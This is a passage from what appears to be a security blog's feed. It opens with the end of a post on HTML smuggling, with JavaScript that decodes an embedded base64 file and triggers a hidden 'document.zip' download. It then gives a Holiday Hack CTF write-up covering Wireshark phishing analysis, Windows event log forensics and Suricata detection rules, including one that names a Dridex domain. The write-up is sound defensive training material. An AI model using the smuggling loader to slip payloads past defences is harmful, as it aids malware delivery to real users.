style=&#34;color:#a6e22e&#34;&gt;a798&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;characters&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;atob&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;file&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;numbers&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;new&lt;/span&gt; Array(&lt;span style=&#34;color:#a6e22e&#34;&gt;characters&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;length&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; (&lt;span style=&#34;color:#66d9ef&#34;&gt;let&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;; &lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;&amp;lt;&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;characters&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;length&lt;/span&gt;; &lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;++&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;numbers&lt;/span&gt;[&lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt;] &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;characters&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;charCodeAt&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;decodedArray&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;new&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;Uint8Array&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;numbers&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;blob&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;new&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;Blob&lt;/span&gt;([&lt;span style=&#34;color:#a6e22e&#34;&gt;decodedArray&lt;/span&gt;], {&lt;span style=&#34;color:#a6e22e&#34;&gt;type&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;:&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;octet/stream&amp;#39;&lt;/span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;filename&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;document.zip&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt;(window.&lt;span style=&#34;color:#a6e22e&#34;&gt;navigator&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;msSaveOrOpenBlob&lt;/span&gt;) window.&lt;span style=&#34;color:#a6e22e&#34;&gt;navigator&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;msSaveBlob&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;blob&lt;/span&gt;, &lt;span style=&#34;color:#a6e22e&#34;&gt;filename&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;else&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; document.&lt;span style=&#34;color:#a6e22e&#34;&gt;createElement&lt;/span&gt;(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;a&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            document.&lt;span style=&#34;color:#a6e22e&#34;&gt;body&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;appendChild&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;style&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;display: none&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;url&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; window.&lt;span style=&#34;color:#a6e22e&#34;&gt;URL&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;createObjectURL&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;blob&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;href&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;url&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;download&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;filename&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;click&lt;/span&gt;();
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            window.&lt;span style=&#34;color:#a6e22e&#34;&gt;URL&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;revokeObjectURL&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;url&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;lt;/&lt;span style=&#34;color:#f92672&#34;&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;lt;&lt;span style=&#34;color:#f92672&#34;&gt;h1&lt;/span&gt;&amp;gt;hello&amp;lt;/&lt;span style=&#34;color:#f92672&#34;&gt;h1&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;/&lt;span style=&#34;color:#f92672&#34;&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The over all structure is still heavily based on &lt;a href=&#34;https://outflank.nl/blog/2018/08/14/html-smuggling-explained/&#34;&gt;Outflank&amp;rsquo;s&lt;/a&gt; article.&lt;/p&gt;
&lt;hr&gt;
&lt;h5 id=&#34;resources&#34;&gt;Resources:&lt;/h5&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cyfirma.com/outofband/html-smuggling-a-stealthier-approach-to-deliver-malware/&#34;&gt;https://www.cyfirma.com/outofband/html-smuggling-a-stealthier-approach-to-deliver-malware/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64&#34;&gt;https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://outflank.nl/blog/2018/08/14/html-smuggling-explained/&#34;&gt;https://outflank.nl/blog/2018/08/14/html-smuggling-explained/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://stackoverflow.com/questions/16245767/creating-a-blob-from-a-base64-string-in-javascript&#34;&gt;https://stackoverflow.com/questions/16245767/creating-a-blob-from-a-base64-string-in-javascript&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/Ma-Cr/offensive-go/blob/main/01-loader.go&#34;&gt;https://github.com/Ma-Cr/offensive-go/blob/main/01-loader.go&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/mdsecactivebreach/SharpShooter&#34;&gt;https://github.com/mdsecactivebreach/SharpShooter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.microsoft.com/en-us/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/&#34;&gt;https://www.microsoft.com/en-us/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://attack.mitre.org/techniques/T1027/006/&#34;&gt;https://attack.mitre.org/techniques/T1027/006/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
    <item>
      <title>Holiday Hack Solutions</title>
      <link>https://ma.tthewgrant.com/posts/holidayhack/</link>
      <pubDate>Wed, 18 Jan 2023 00:00:00 +0000</pubDate>
      
      <guid>https://ma.tthewgrant.com/posts/holidayhack/</guid>
      <description>Table of Contents Recover the Tolkien Ring WireShark Practice Windows Event Logs Suricata Regatta Recover the Elfen Ring Clone with a Difference Prison Escape Jolly CI/CD Recover the Web Ring Naughty IP Credential Mining 404 FTW IMDS, XXE, and Other Abbreviations Recover the Tolkien Ring Wireshark Practice Challenge description:
Use the Wireshark Phishing terminal in the Tolkien Ring to solve the mysteries around the suspicious PCAP. Get hints for this challenge by typing `hint` in the upper panel of the terminal.</description>
      <content>&lt;h3 id=&#34;table-of-contents&#34;&gt;Table of Contents&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#recover-the-tolkien-ring&#34;&gt;Recover the Tolkien Ring&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#wireshark-practice&#34;&gt;WireShark Practice&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#windows-event-logs&#34;&gt;Windows Event Logs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#suricata-regatta&#34;&gt;Suricata Regatta&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#recover-the-elfen-ring&#34;&gt;Recover the Elfen Ring&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#clone-with-a-difference&#34;&gt;Clone with a Difference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#prison-escape&#34;&gt;Prison Escape&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#jolly-cicd&#34;&gt;Jolly CI/CD&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#recover-the-web-ring&#34;&gt;Recover the Web Ring&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#naughty-ip&#34;&gt;Naughty IP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#credential-mining&#34;&gt;Credential Mining&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#404-ftw&#34;&gt;404 FTW&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imds-xxe-and-other-abbreviations&#34;&gt;IMDS, XXE, and Other Abbreviations&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&#34;recover-the-tolkien-ring&#34;&gt;Recover the Tolkien Ring&lt;/h1&gt;
&lt;h3 id=&#34;wireshark-practice&#34;&gt;Wireshark Practice&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Use the Wireshark Phishing terminal in the Tolkien Ring to solve the mysteries around the suspicious PCAP. 
Get hints for this challenge by typing `hint` in the upper panel of the terminal.
&lt;/code&gt;&lt;/pre&gt;
  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208185622.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;To start the rest of the questions for this challenge, you have to answer yes.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208185654.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;A large number of HTTP requests are seen in the packet capture when loaded into Wireshark. When following the first HTTP stream in Wireshark, you can see that a zip is sent in a response. I then looked into exporting zip files from Wireshark captures, and came across a &lt;a href=&#34;https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/&#34;&gt;Unit42 article&lt;/a&gt; demonstrating how objects can be exported from captures. &lt;br&gt;
Working from the article, it&amp;rsquo;s clear that the question is looking for HTTP as an answer due to the exportable object being from an HTTP stream and being an HTTP object.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208185746.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;The answer that you can then submit in the console is &lt;code&gt;http&lt;/code&gt;.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208185842.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;Going to the menu that&amp;rsquo;s spawned from selecting Export Objects &amp;gt; HTTP&amp;hellip;, the export list shows three possibilities for objects. Two are &lt;code&gt;app.php&lt;/code&gt;, and one is &lt;code&gt;favicon.ico&lt;/code&gt;. Looking at the sizes for each of the three files, the largest is clearly &lt;code&gt;app.php&lt;/code&gt; at 808 kB so the answer is then &lt;code&gt;app.php&lt;/code&gt;. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208185911.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208185939.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;In the same screenshot as the exportable objects, the packet numbers corresponding to the objects are the left most column in the list. From that screenshot, the packet number for the largest &lt;code&gt;app.php&lt;/code&gt; file is 687. The answer is then &lt;code&gt;687&lt;/code&gt;.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208190010.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;Packet number 687 can be manually searched for, or filtered for in Wireshark. From that packet, the  source address is 192.185.57.242 which is the answer for this question. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208190041.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208190147.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;After exporting the largest &lt;code&gt;app.php&lt;/code&gt; HTTP object in Wireshark, a few things can be noted. The two main ones for this challenge are the base64 encoded blob that takes up much of the file, and the call to &lt;code&gt;saveAs&lt;/code&gt; with the filename at the bottom of the file. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208190329.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;From the &lt;code&gt;saveAs&lt;/code&gt; call, the name of the file which is saved to infected hosts is &lt;code&gt;Ref_Sept24-2020.zip&lt;/code&gt;. Therefore, the answer to this challenge is &lt;code&gt;Ref_Sept24-2020.zip&lt;/code&gt;.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208192423.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;When looking into ways to identify bad TLS certificates in Wireshark, I came across a community answer on the Wireshark forums regarding &lt;a href=&#34;https://ask.wireshark.org/question/12156/how-to-extract-certificate-from-ssl-session-setup-trace/&#34;&gt;the concept&lt;/a&gt;. &lt;br&gt;
From that answer, it looks like you can just filter for &lt;code&gt;tls.handshake.type == 11&lt;/code&gt; in Wireshark. From there, the certificate details are in the packet information, including the country information for the certificate. In the packet information, the country can be found under &lt;code&gt;RDNSequence id-at-countryName&lt;/code&gt;. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208192534.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;To find all of the country names related to the bad certificates, I just manually went through the key exchange requests and recorded the unique countries. &lt;br&gt;
Through that, I found that the answer was &lt;code&gt;Ireland, Israel, South Sudan, United States&lt;/code&gt;.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208192738.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;From everything we&amp;rsquo;ve seen, I believe it&amp;rsquo;s safe to say that the host is infected.&lt;/p&gt;
&lt;h3 id=&#34;windows-event-logs&#34;&gt;Windows Event Logs&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Investigate the Windows event log mystery in the terminal or offline. 
Get hints for this challenge by typing `hint` in the upper panel of the Windows Event Logs terminal.
&lt;/code&gt;&lt;/pre&gt;
  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208193428.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;After answering yes, the first question is: &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208193530.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;Using &lt;code&gt;less&lt;/code&gt; in the provided console shows the date and time at the top of the event viewer file. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208193547.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;The answer is then &lt;code&gt;12/24/2022&lt;/code&gt;.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208193603.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;Manually looking through the event logs in the file, I found a couple events which stand out. Including the one below.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208194627.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;So it looks like the answer is &lt;code&gt;recipe updated.txt&lt;/code&gt;.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208194647.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;From here, I kept manually looking through the events in the provided log file, and found one referencing a Powershell command assigning the contents of the &lt;code&gt;Recipe&lt;/code&gt; file to the &lt;code&gt;$foo&lt;/code&gt; variable. However, the formatting was off when trying to submit the command so I switched to Window&amp;rsquo;s event viewer to make searching a little easier. &lt;br&gt;
In event viewer, I searched for &lt;code&gt;$foo&lt;/code&gt; and found the full, original command.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208202516.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;The answer is then &lt;code&gt;$foo = Get-Content .\Recipe| % {$_ -replace &#39;honey&#39;, &#39;fish oil&#39;}&lt;/code&gt;.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208202531.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;The question details that the variable is then used again for saving the content to a new file. Considering this, I searched for &lt;code&gt;$foo&lt;/code&gt; again and found the event below.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208202743.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;The command shown in the event and the answer to this question is &lt;code&gt;$foo | Add-Content -Path &#39;Recipe&#39;&lt;/code&gt;.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208202806.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;Searching for &lt;code&gt;Add-Content&lt;/code&gt; in event viewer and looking through the resulting events, the most common filename looks to be &lt;code&gt;Recipe.txt&lt;/code&gt; which is the answer to this question.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208202958.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;



  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208203014.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;Yes, we&amp;rsquo;ve previously seen events in the log file which show that files were deleted.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208203056.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;Question 2 was referring to &lt;code&gt;recipe updated.txt&lt;/code&gt; which didn&amp;rsquo;t have an event corresponding to it for file deletion.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208203115.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;Looking at &lt;code&gt;Recipe.txt&lt;/code&gt; events, there is a &lt;code&gt;del&lt;/code&gt; command executed with the &lt;a href=&#34;https://www.crowdstrike.com/blog/investigating-powershell-command-and-script-logging/&#34;&gt;4104&lt;/a&gt; Event ID. Therefore, the answer for this question is &lt;code&gt;4104&lt;/code&gt;.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208203307.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;



  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208203329.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;Yes, it&amp;rsquo;s safe to say that the secret ingredient has been compromised.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221208203552.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;From question 3, it&amp;rsquo;s likely that the secret ingredient is &lt;code&gt;honey&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id=&#34;suricata-regatta&#34;&gt;Suricata Regatta&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Help detect this kind of malicious activity in the future by writing some Suricata rules. 
Work with Dusty Giftwrap in the Tolkien Ring to get some hints.
&lt;/code&gt;&lt;/pre&gt;
  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209183448.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;Resources that I found helpful for these challenges are below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html&#34;&gt;https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://suricata.readthedocs.io/en/suricata-6.0.0/rules/dns-keywords.html&#34;&gt;https://suricata.readthedocs.io/en/suricata-6.0.0/rules/dns-keywords.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For these ones, I found it helpful to break down the rule per element. &lt;br&gt;
For this specific challenge, the question is asking for an alert rule so the action that we&amp;rsquo;ll want is &lt;code&gt;alert&lt;/code&gt;. The protocol that we&amp;rsquo;re looking for is &lt;code&gt;DNS&lt;/code&gt;. &lt;br&gt;
The source and destination in this case can be &lt;code&gt;any&lt;/code&gt; as no hosts are specified, and the ports can be &lt;code&gt;any&lt;/code&gt; as well since they aren&amp;rsquo;t specified. &lt;br&gt;
The direction is singular in this case so we&amp;rsquo;ll use &lt;code&gt;-&amp;gt;&lt;/code&gt;. &lt;br&gt;
At this point the rule looks like &lt;code&gt;alert dns any any -&amp;gt; any any&lt;/code&gt;. &lt;br&gt;
From here, the message on the alert is specified in the challenge as &amp;ldquo;Known bad DNS lookup, possible Dridex infection&amp;rdquo;. &lt;br&gt;
The second resource from above is helpful for identifying the correct keywords for this challenge. The second field that we&amp;rsquo;ll have to add is &lt;code&gt;dns.query&lt;/code&gt; to be able to get the &lt;code&gt;content&lt;/code&gt; field. The &lt;code&gt;content&lt;/code&gt; field is the third field for the alert which we want to search for &amp;ldquo;adv.epostoday.uk&amp;rdquo; in. &lt;br&gt;
Finally, we can add the &lt;code&gt;nocase&lt;/code&gt; flag so it&amp;rsquo;s not case sensitive, and we can specify a unique &lt;code&gt;sid&lt;/code&gt; for the alert. &lt;br&gt;
Therefore the rule that can be added to &lt;code&gt;suricate.rules&lt;/code&gt; is: &lt;br&gt;
&lt;code&gt;alert dns any any -&amp;gt; any any (msg:&amp;quot;Known bad DNS lookup, possible Dridex infection&amp;quot;; dns.query; content:&amp;quot;adv.epostoday.uk&amp;quot;; nocase; sid:1;)&lt;/code&gt;&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209184331.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;The second challenge is still looking for an &lt;code&gt;alert&lt;/code&gt;, but the protocol in this case is &lt;code&gt;HTTP&lt;/code&gt;. &lt;br&gt;
